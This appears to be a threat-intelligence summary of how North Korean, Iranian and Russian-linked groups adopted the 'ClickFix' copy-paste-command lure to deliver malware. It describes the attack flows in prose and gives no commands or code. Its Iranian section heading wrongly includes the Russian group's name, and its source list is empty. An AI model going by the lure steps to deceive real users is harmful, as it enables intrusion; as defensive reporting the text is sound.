A growing number of nation-state threat actors have begun incorporating the so-called “ClickFix” social-engineering method into their malware delivery chains. Between late 2024 and early 2025, groups linked to North Korea, Iran, and Russia all leveraged this user-driven technique—originally popular among cyber-criminals to trick targets into self-deploying malicious payloads .

The ClickFix Technique Explained

ClickFix is a multi-step social engineering playbook that convinces victims to copy, paste, and execute commands on their own machines under benign pretenses—“fixing” an issue, completing a CAPTCHA, or registering a device. Once the user runs the supplied command, it typically fetches and runs follow-on scripts that implant malware, often without triggering traditional security tools.

North Korean-Linked TA427 (Kimsuky)

• Timeline & Targets: In January–February 2025, Kimsuky (tracked as TA427) used ClickFix in phishing lures aimed at fewer than five think-tank organizations focused on North Korean affairs.
• Attack Flow: Victims received meeting requests from a spoofed Japanese diplomat. After brief social-engineering chit-chat, they were sent a PDF linking to a faux “questionnaire” on a site mimicking the Japanese Embassy.
• User-Driven Execution: The site urged victims to copy–paste a PowerShell command into Windows Run. That command retrieved and ran a second script, which displayed the decoy questionnaire PDF while silently installing a scheduled task that downloaded and launched the open-source Quasar RAT every 19 minutes.

Iran-Linked TA450 (MuddyWater / UNK_RemoteRogue)

• November 2024 Campaign: Coinciding with Microsoft’s November Patch Tuesday, MuddyWater sent emails spoofing security updates. Recipients were instructed to execute a ClickFix-style PowerShell command with admin rights.
• RMM Abuse: That command quietly installed legitimate remote monitoring and management (RMM) software (e.g., “Level”). Operators then abused the RMM tool to maintain persistence, conduct espionage, and exfiltrate data.
• Geographic Focus: Finance, government, health, education, and transportation organizations across the UAE, Saudi Arabia, Canada, Germany, Switzerland, and the United States were targeted.

Russian-Affiliated UNK_RemoteRogue

• Late 2024 Activity: Toward year-end, a suspected Russian group (UNK_RemoteRogue) leveraged compromised Zimbra mail servers to send lures containing links to Office documents.
• Interactive Guides: Landing pages displayed step-by-step instructions—complete with embedded YouTube tutorials—showing victims how to paste and run JavaScript in PowerShell. This ultimately launched Empire C2-linked code.
• Scope & Overlap: Ten messages hit two defense-industry organizations. Infrastructure overlap was noted with other phishing campaigns targeting aerospace and defense entities under the guise of Ukraine-related updates.

Implications & Outlook

The rapid uptake of ClickFix by disparate nation-state groups within weeks highlights its effectiveness and low cost of entry. While not yet a permanent fixture in every state-sponsored toolkit, the technique’s success suggests we’ll likely see further experimentation and adoption by other advanced threats in the months ahead.

Sources